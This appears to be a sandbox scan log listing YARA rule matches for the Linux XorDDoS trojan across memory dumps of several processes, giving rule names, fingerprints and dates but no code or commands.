Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
